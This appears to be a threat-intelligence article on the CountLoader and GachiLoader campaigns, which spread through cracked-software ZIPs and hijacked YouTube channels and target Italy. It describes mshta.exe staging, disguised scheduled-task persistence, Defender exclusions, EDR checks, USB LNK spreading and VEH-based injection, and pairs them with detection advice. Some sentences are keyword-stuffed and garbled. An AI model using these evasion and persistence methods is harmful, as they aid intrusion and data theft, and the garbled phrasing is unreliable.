Surprising fact: recent analysis shows that a single compromised distribution chain can infect hundreds of systems in Italy within days.
This introduction explains how downloads of cracked software and malicious software youtube videos have merged into an efficient infection funnel. Threat intelligence teams have disclosed details of a new campaign that uses MediaFire ZIP chains and a so-called “YouTube Ghost Network.”
Researchers disclosed details from Cyderes Howler Cell and Check Point reveal two loaders in play: one tracked since mid-2025 and a Node.js loader using heavy obfuscation and novel PE injection. Both act as initial access tools in multistage attacks that deliver information stealers like ACR Stealer and Rhadamanthys.
The risk is real for consumers and enterprises across Europe, especially where Microsoft Word cracks and tutorial installers are popular. Signed binary abuse, fileless execution, scheduled tasks, WMI checks, and Defender tampering all extend dwell time for attackers.
Key Takeaways
- Cracked software and compromised video accounts form a robust infection vector targeting Italy.
- Cyderes Howler Cell and Check Point researchers disclosed details of the new campaign.
- Loaders serve as first-stage tools for persistence, evasion, and data theft.
- Distribution uses MediaFire ZIP chains and a YouTube Ghost Network of compromised accounts.
- Defender tampering, fileless methods, and PE injection make detection harder.
- Organizations should monitor indicators and apply mitigations tailored for local environments.
Breaking: Researchers warn of new multistage malware campaigns leveraging cracked software and YouTube
Analysts have reported a surge of linked, multistage campaigns that use popular download portals and hijacked content channels to deliver staged loaders at scale.
Researchers disclosed details of two parallel streams: one using cracked software distribution hubs and another leveraging a YouTube Ghost Network of 39 compromised accounts.
Threat teams note over 100 tutorial posts accumulated roughly 220,000 views since December 22, 2024, before many were removed. This reach shows how social trust boosts technical chains.
Key technical points:
- CountLoader 3.2 is staged via ZIP archives, a renamed Python interpreter and a call to mshta.exe that launches persistent tasks.
- GachiLoader uses JavaScript/Node.js with heavy obfuscation and staged payload loading to evade analysis.
- Established threat intelligence teams, including Cyderes Howler, analyzed the activity for rapid defensive guidance.
The campaigns highlight how distribution vector new tactics blend social engineering with technical evasion. Italian organizations that rely on popular installers or video guidance face heightened risk.
| Aspect | CountLoader 3.2 | GachiLoader |
|---|---|---|
| Primary vector | cracked software distribution portals | compromised video accounts |
| Technique | ZIP staging, renamed Python, mshta.exe | Node.js, heavy obfuscation, staged loaders |
| Scale observed | Active waves in download hubs | 39 accounts, ~220,000 views |
What happened: Timeline, scope, and who’s behind the disclosures
A coordinated timeline of activity shows two loader families operating in parallel across late 2024 and into 2025. This section summarizes key dates, scope, and the primary analysts who traced the chains.
Key dates and activity window
GachiLoader-linked posts appeared from December 22, 2024, and continued into 2025. CountLoader has been observed in the wild since at least June 2025, with the latest 3.2 wave active in mid-2025. These milestones provide the core activity window for defender timelines.
Research sources and attribution
Researchers disclosed details that map each distribution chain to its origin. The howler cell threat work from Cyderes Howler Cell documents CountLoader’s distribution and features. Check Point’s cell threat intelligence traced the channel-based loader mechanics.
The analysts also disclosed details about a new version modular trend: loaders act as first-stage scaffolding, not final payloads. The reports name the countloader initial tool route and show how operators used cracked software portals to redirect victims to encrypted MediaFire ZIPs and passworded Word files.
Observers counted over 100 uploads and roughly 220,000 views across 39 compromised accounts, illustrating how videos spread countloader via social trust. These findings form a practical set of indicators defenders can use to track this new campaign and prioritize detection across Italian environments.
Cracked software distribution sites as a distribution vector
A common trap redirects users seeking free Office copies to MediaFire archives that conceal multi-layered loaders. This section shows how counterfeit installers become a stealthy distribution route in Italy.
From counterfeit Microsoft Word downloads to MediaFire ZIPs
Attackers publish counterfeit installers on forums and repo pages. Victims click links that lead to MediaFire-hosted ZIPs. The hosting gives an air of legitimacy and resists quick takedown.
Encrypted archives and renamed Python interpreter “Setup.exe”
The delivered ZIP uses a two-layer scheme: a plain archive contains an encrypted ZIP plus a Word doc with the password. Inside the decrypted archive is a renamed Python interpreter called Setup.exe.
That executable looks normal but runs a command to trigger further stages. Splitting artifacts across archives makes detection harder for perimeter scanners.
Abuse of mshta.exe for initial access and stealth
Setup.exe invokes a living-off-the-land binary to fetch the next payload. The chain calls mshta.exe to retrieve the loader from a remote host.
“Using trusted binaries and popular file-sharing links raises the chance that user-initiated downloads bypass controls.”
- The lure: counterfeit installers for legitimate apps steer users into attacker-controlled paths.
- Two-layer ZIP: plain ZIP → encrypted ZIP + passworded Word file.
- Renamed interpreter: Setup.exe triggers mshta.exe to fetch the staged loader.
- Mitigation points: block untrusted script hosts and restrict mshta.exe where not business-critical.
| Step | Artifact | Defensive signal |
|---|---|---|
| Initial lure | Counterfeit Word installer link | Untrusted download domains, forum referrals |
| Staging | Plain ZIP with encrypted ZIP + password.docx | ZIP within ZIP, passworded archive alerts |
| Execution | Renamed Python as Setup.exe → mshta.exe fetch | Unusual mshta.exe network calls, renamed interpreter execution |
CountLoader: a modular, stealthy loader evolving in the wild
CountLoader 3.2 acts as an initial, modular loader that orchestrates multistage delivery and evasion. It retrieves stages via mshta.exe and builds a persistent foothold designed to last years.
Version details and capabilities: CountLoader 3.2 feature set
The version modular stealthy release supports EXE, MSI, DLLs invoked through rundll32.exe, and Python modules shipped inside ZIPs. It can run PowerShell purely in memory and launch remote content without writing payloads to disk.
Persistence via scheduled tasks mimicking GoogleTaskSystem
CountLoader uses a scheduled task named GoogleTaskSystem136.0.7023.12. The job runs every 30 minutes for up to ten years and uses a fallback domain to maintain connectivity.
Security-aware behavior: CrowdStrike Falcon checks via WMI
The loader queries WMI to detect CrowdStrike Falcon. If the agent is present, it alters invocation patterns to reduce noisy activity and avoid immediate termination.
Fileless execution paths: PowerShell, rundll32.exe, and MSI
Fileless options include in-memory PowerShell, mshta-hosted scripts, and DLL injection via rundll32. These paths minimize disk artifacts and complicate forensic traces.
“Observed chains culminate in data-stealing payloads; defenders must watch for scheduled-task anomalies and mshta network calls.”
- USB propagation: malicious LNK files placed next to hidden originals invoke mshta with C2 parameters.
- Host profiling: the loader gathers system inventory to tailor delivery of additional malware families.
- Cleanup: it can remove its scheduled task to erase traces if instructed.
| Feature | Behavior | Defensive signal |
|---|---|---|
| Persistence | GoogleTaskSystem136.0.7023.12, 30-min interval, 10-year TTL | Unusual scheduled task name, long lifetime |
| Security checks | WMI queries for CrowdStrike Falcon; adaptive commands | WMI calls to security products, modified task invocation |
| Execution methods | EXE, MSI, DLL via rundll32, in-memory PowerShell, mshta | No disk writes, mshta network fetches, rundll32 launching unsigned DLLs |
| Propagation | USB LNK chain invoking mshta with C2 | Autorun-like LNKs, unexpected mshta launches from removable media |
Operational note: observed campaigns using this loader often delivered ACR Stealer as the final payload. Italian organizations handling regulated data should prioritize layered detection and controls for living-off-the-land binaries and removable media.
YouTube Ghost Network delivers GachiLoader via compromised accounts
A covert network of hijacked channels has pushed installer guides that embed malicious links into trusted descriptions.
Check Point documented a Node.js loader distributed through over 100 uploads across 39 compromised accounts. The set of posts reached about 220,000 views since December 22, 2024.
Scale of exposure
Attackers seeded descriptions with short-lived links to staged hosts. Many viewers followed the links seeking quick fixes, increasing reach in Italy where tutorial content is widely trusted.
Technical profile
GachiLoader uses heavy obfuscation and anti-analysis checks to resist sandboxes. It runs Node.js processes that appear benign but perform stealthy tasks.
Escalation and tampering
The loader attempts privilege escalation using net session checks and UAC prompts. Operators also terminate SecHealthUI.exe and set Defender exclusions for paths such as C:\Users\ and C:\ProgramData\.
“In some cases an intermediate module (kidkadi.node) loads payloads via Vectored Exception Handling-based PE injection.”
- Final stage: direct payload download or intermediate VEH-based loader.
- Observed payload: Rhadamanthys info‑stealer in at least one delivery.
- Detection focus: browser referral patterns, short-lived links, and unusual Node.js processes.
| Aspect | Observed behavior | Defensive signal |
|---|---|---|
| Distribution | 100+ posts from 39 accounts, ~220,000 views | Surge in external referrals from video descriptions |
| Loader tech | Node.js, heavy obfuscation, anti-analysis | Unusual node.exe instances, packed JS files |
| Persistence & tamper | UAC prompts, SecHealthUI.exe termination, Defender exclusions | Changed Defender exclusions, process terminations in logs |
Novel techniques: Vectored Exception Handling and PE injection chains
Security teams are now seeing injection chains that hijack exception handlers to load hidden PE payloads at runtime.
How it works: attackers trigger a legitimate DLL load, then use Vectored Exception Handling (VEH) to intercept the process flow. The handler maps a malicious PE into memory and swaps the original module on-the-fly.
Kidkadi second-stage and DLL swap on-the-fly
Check Point highlighted a variant that drops a node-based second stage named kidkadi.node.
This module loads a trusted DLL, then uses VEH to replace it with a hostile payload. The swap happens in memory, so static file scanners see only the original file.
Signed binary abuse and evasion trends security teams must track
Cyderes reported a trend toward signed binary abuse and fileless execution in a new version modular pattern.
Both loader families use living‑off‑the‑land binaries like mshta.exe and PowerShell for delivery additional stages. This reduces disk artifacts and hinders EDR telemetry.
“VEH-based injection and on-the-fly DLL swaps complicate forensic analysis and blunt signature defenses.”
- kidkadi.node acts as the intermediary for runtime injection.
- DLL swap at load time bypasses static integrity checks.
- Multistage attack access lets operators rapidly change final payloads.
- SOCs in Italy should favor behavior analytics over hash-based controls.
| Technique | Why it evades | Detection tip |
|---|---|---|
| VEH PE injection | No disk write; loads in memory | Monitor rare exception handler registrations |
| Signed-binary abuse | Trusted binary appears legitimate | Track abnormal child processes for mshta.exe and node.exe |
| On-the-fly DLL swap | Static scanners miss replaced module | Watch DLL load anomalies and mismatched module hashes |
Action: test defenses against memory injection, harden DLL load paths, and log unusual error-handling flows on hosts that fetch content from distribution sites. These steps help counter the stealthy loader known in disclosed details new reports and lower risk linked to cracked software lures.
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
A dual-path campaign used trusted file hosts and compromised video accounts to seed staged loaders that enable long-term access.
Cyderes Howler Cell and Check Point documented two delivery streams: one via counterfeit download hubs and another via a Ghost Network of hijacked channels. Both pipelines deploy modular loaders that start multistage attack access and later fetch additional malware.
Each loader plays a role: initial access, persistence, evasion, and final payload delivery. Operators mix mshta.exe calls, in-memory PowerShell, and VEH-driven PE injection to avoid disk traces.
Detection anchors include unusual scheduled task names, mshta invocation strings, and Defender exclusion changes. These artifacts give SOCs practical signals to hunt on.
“Timely threat intelligence is critical; disclosed details new from research teams help map behavior to alerts.”
- Two-pronged distribution: file-host links and hijacked channel descriptions.
- Loaders are flexible—operators can swap ACR Stealer, Rhadamanthys, or other payloads.
- Trusted binaries and fileless methods are common across both campaigns.
| Vector | Technique | Key detection |
|---|---|---|
| Download hubs | ZIP staging, renamed interpreter, mshta fetch | Passworded archives, mshta network calls, odd task names |
| Hijacked channels | Short-lived links, Node.js loader, VEH injection | Unusual node.exe instances, modified Defender exclusions |
| Common traits | Fileless execution, persistence, payload flexibility | WMI checks for EDR, scheduled-task anomalies, in-memory indicators |
For Italian organizations, the risk intersects GDPR obligations and operational continuity. Human behavior—seeking free tools and following tutorials—remains the primary enabler.
Next: the article will dive into toolchains and payload families, and offer detection and mitigation steps tailored for Europe and Italy.
Toolchain and payloads: from initial tool to additional malware families
Early-stage loaders act like gatekeepers, choosing follow‑on payloads after profiling a system. The loader performs quick host checks and then requests the most profitable follow-up modules from the operator.
ACR Stealer, Rhadamanthys, and other loader-delivered payloads
ACR Stealer is a data-harvesting payload observed after host profiling on infected machines. It exfiltrates credentials, browser stores, and local tokens for resale or account takeover.
Rhadamanthys appears in deliveries tied to a Node.js loader. It focuses on information theft and credential collection for immediate monetization.
“Operators match payloads to system value: data thieves for rich endpoints, lighter tools for broader reach.”
USB propagation through malicious LNK alongside hidden originals
The loader known for removable media propagation creates malicious LNK files next to hidden originals. Each LNK runs the legitimate file while invoking mshta.exe with C2 parameters to fetch the loader.
This trick widens infections beyond a single host and targets small offices where USB sharing is common.
- Modular execution paths include EXE, DLL, MSI, and Python modules to maximize flexibility.
- Removing scheduled tasks helps attackers blend into normal churn and hinders incident response.
- Payload choice ties to monetization: stolen data can be sold, or later stages can enable ransomware.
| Stage | Observed behavior | Detection tip |
|---|---|---|
| Profiling | Host checks for AV, user role, installed apps | Unusual WMI queries, abnormal process trees |
| Delivery additional | ACR Stealer, Rhadamanthys, other additional malware families | Data‑exfiltration spikes, new outbound TLS hosts |
| Propagation | USB LNK next to hidden originals invoking mshta.exe | New .lnk files on removable media, mshta.exe with unexpected args |
| Persistence | Scheduled tasks that can be removed after use | Correlate task creation with USB events and EDR alerts |
Defender note: baseline LNK behavior, monitor mshta invocations, and correlate EDR telemetry with USB insertion and new scheduled tasks to detect this version modular toolchain early.
Impact and risk to Europe with a focus on Italy
In Italy, recent incidents show how simple tutorial links and shared archives can produce long-term intrusions that affect privacy, operations, and compliance.
Data theft and regulatory exposure: information stealers such as ACR Stealer and Rhadamanthys put personal data, client records, and intellectual property at risk. Loss of confidential records can trigger GDPR breach notifications and fines.
Operational disruption: loaders that set Defender exclusions or maintain stealthy persistence extend dwell time. Prolonged access increases the chance of follow-on ransomware, espionage modules, or mass exfiltration.
Where the risk concentrates
- Shared devices and USB propagation raise outbreak risk in small offices and manufacturing shops.
- Public administration and professional services that rely on Office workflows face higher exposure from software distribution sites and tutorial links.
- Third-party contractors following risky guides can import threats into otherwise secure networks.
Actionable priorities for Italian organizations
Map how stolen data affects GDPR scope, harden controls for living‑off‑the‑land binaries, and feed disclosed details about the new campaign used into SIEM rules. Prioritize hunting for unusual scheduled tasks, mshta/network beacons, and node/pythonized processes to reduce mean time to detect.
“Align risk assessments to observed TTPs, not generic checklists, to lower regulatory and reputational harm.”
| Risk | Effect | Immediate action |
|---|---|---|
| Data theft | GDPR exposure, fines | Encrypt sensitive stores, monitor exfiltration |
| Persistence | Long dwell time | Hunt scheduled tasks, Defender exclusions |
| USB propagation | Operational outages | Restrict removable media, scan on insert |
Detection priorities: indicators, behaviors, and telemetry to monitor
Detecting early-stage loader behavior depends on spotting a handful of repeatable host and network patterns.
Start with immediate, high-value signals that map to the disclosed details new reports provide. Focused monitoring reduces noise and cuts dwell time in Italy.
Watch for mshta.exe, scheduled task anomalies, and network beacons
- mshta.exe invocation: alert on mshta.exe fetching external URLs or running script hosts from inherited scheduled‑task command lines.
- Scheduled task fingerprints: hunt for creations like GoogleTaskSystem136.0.7023.12, long lifetimes, or 30‑minute cadences.
- Network beacons: flag periodic outbound TLS/HTTP requests that align with scheduled task timing or unusual domains.
Host profiling artifacts, ZIP-based staging, and pythonized loaders
- Baseline WMI queries that enumerate AV (look for CrowdStrike Falcon checks) and alert on spikes.
- Correlate ZIP extraction events with immediate mshta or script host launches; renamed Python interpreters like “Setup.exe” deserve special scrutiny.
- Track Node.js processes spawning system utilities or making odd network calls; kidkadi.node and VEH-based PE injection require EDR in-memory capture.
“Enrich SIEM with campaign strings, suspicious task names, and file paths to speed detection and response.”
| Signal | Why it matters | Action |
|---|---|---|
| mshta.exe network call | Initial fetch for staged loaders | Block / alert on external hosts |
| Google-like scheduled task | Persistent cadence, long TTL | Investigate and quarantine host |
| WMI AV enumeration | Host profiling step | Alert and correlate with process tree |
Mitigation and response: practical steps for organizations and users
Focus on practical fixes that close common abuse paths for living-off-the-land binaries and removable media.
Application whitelisting prevents renamed interpreters and unknown launches. Restrict mshta.exe, PowerShell, and rundll32.exe to approved workflows. Use allowlists that block executables with unusual names such as renamed Python builds.
EDR with fileless detection helps catch in-memory execution, VEH-based injection, and script-host abuse. Configure alerts for Defender exclusion changes and node.exe processes that spawn system utilities.
Control removable media to stop USB LNK chains. Disable autorun, scan link files at insertion, and limit write access to system paths. Enforce MFA and least-privilege roles to reduce privilege escalation success.
Operational playbooks and network controls
- Build SOC playbooks to triage mshta-invoked network calls, odd scheduled tasks, and node.js anomalies.
- Use egress filtering and DNS monitoring to block C2 hosts used by the initial tool multistage chains.
- Patch endpoints and security tools quickly; keep quarantine workflows ready for any stealthy loader known to appear.
“Close the easiest doors first: restrict LOLBins, lock removable media, and let behavioral EDR hunt in-memory threats.”
| Control | Why it matters | Immediate action |
|---|---|---|
| Application allowlist | Stops renamed interpreters and unauthorized EXEs | Block unknown Setup.exe variants and enforce signed-only rules |
| Behavioral EDR | Detects fileless execution and PE injection | Enable memory scanning and VEH/PowerShell heuristics |
| Removable media policy | Prevents USB LNK propagation | Disable autorun, scan on insert, limit write paths |
| Identity & network | Reduces escalation and C2 reach | Require MFA, restrict privileges, apply egress/DNS filtering |
Next steps: coordinate with threat intel—such as the howler cell threat reports—to update detections for additional malware and keep blocklists current.
Conclusion
Two parallel distribution ecosystems now funnel staged loaders into widely used host networks in Europe.
The reports provide clear details new campaign behavior: CountLoader 3.2 and GachiLoader leverage cracked software portals and a Ghost Network of hijacked channels to deliver info‑stealers like ACR Stealer and Rhadamanthys. Techniques include mshta‑initiated downloads, scheduled‑task persistence, Defender exclusion changes, USB LNK propagation, and VEH‑based PE injection.
Defenders in Italy should prioritize behavioral detection: alert on mshta network calls, hunt odd scheduled‑task names, watch for Defender tampering, and flag unexpected node/python processes. Harden LOLBins, restrict removable media, and deploy behavior‑focused EDR to detect fileless execution.
Howler cell research and other intelligence must feed SIEM rules and tests. Simulate these TTPs, validate logging, and align SOC, IT, and leadership to keep layered defenses ahead of evolving threats.
FAQ
What are the main threats described in the recent disclosures?
Researchers have documented a multistage campaign that uses pirated application installers and compromised video platform accounts to deliver a modular loader and follow-on payloads. The campaign begins with poisoned archives and installers that execute living-off-the-land binaries, then hands off to a stealthy loader which deploys data thieves and backdoors.
Who published the research and what intelligence sources were cited?
The analysis draws on work by incident responders and threat intelligence teams, including Cyderes Howler Cell and Check Point, which provided telemetry, sample analysis, and reporting on activity observed across 2024–2025.
How are fake installers and archive hosts being abused for initial access?
Threat actors place tampered installers on file hosting and mirror sites, rename runtime interpreters to executable installers, and use encrypted ZIPs. They also leverage mshta.exe and other legitimate tools to execute embedded scripts and drop the next-stage loader without writing obvious executables.
What capabilities does the loader exhibit in the wild?
The loader is modular and stealthy. It supports fileless techniques through PowerShell and rundll32.exe, persistence via scheduled tasks that mimic legitimate system tasks, and environment checks to evade analysis. It can fetch additional malware families after gaining a foothold.
How were video platform accounts used in the campaign?
Compromised creator accounts hosted dozens of videos that linked to malicious installers. The campaign used many accounts to increase reach and avoid rapid takedown, resulting in significant view counts and extensive exposure before detection and remediation.
What novel evasion techniques should defenders be aware of?
Defenders should watch for vectored exception handling abuse, on-the-fly DLL swaps, and signed-binary misuse. The chain may include layered PE injections and anti-analysis checks that skip execution when common security products are present.
Which payloads and secondary tools have been observed after the loader runs?
Analysts observed credential and data stealers, infostealers targeting browsers and system artifacts, and bespoke backdoors. There are also reports of tools that propagate via removable media using malicious shortcuts alongside hidden original files.
What are the primary detection indicators teams can monitor?
Monitor mshta.exe invocation patterns, unusual scheduled task names that imitate system services, unexpected network beacons to cloud storage or C2 domains, Python runtime named as Setup.exe, and archives that contain renamed interpreters or obfuscated loaders.
What immediate mitigation steps should organizations take?
Apply application allowlisting, restrict use of living-off-the-land binaries where feasible, enable EDR features that detect fileless execution, enforce removable media controls, and require multifactor authentication for accounts tied to publishing platforms and developers.
How can end users reduce personal risk from these attacks?
Avoid downloading pirated installers or tools from untrusted sites. Verify publisher sources, scan archives before extraction, enable platform account protections, and keep endpoint security up to date. When in doubt, obtain software directly from vendors or reputable stores.
Are specific regions or sectors more at risk?
The campaign shows notable exposure in Europe, with incident responders highlighting impacts in Italy. Organizations that handle regulated personal data face elevated GDPR and operational risk if infected.
What telemetry should security teams collect to investigate potential infections?
Collect process creation logs (especially for mshta.exe, rundll32.exe, and PowerShell), scheduled task listings, network connection logs to cloud storage and uncommon domains, file system artifacts of staged ZIPs, and indicators from EDR showing in-memory injections or DLL swaps.
How do attackers try to disable or evade endpoint protections?
Observed techniques include attempts to disable built-in defenders, create exclusions, check for EDR products via WMI queries, and abort execution when sandbox or analysis conditions appear. Attackers also leverage signed binaries to blend with legitimate activity.
Should organizations remove all instances of pirated installers from their environments?
Yes. Removing unlicensed and unknown installers lowers exposure. Replace such files with vendor-supplied installers, scan archived content before use, and enforce policies that block downloads from untrusted hosting sites and mirrors.
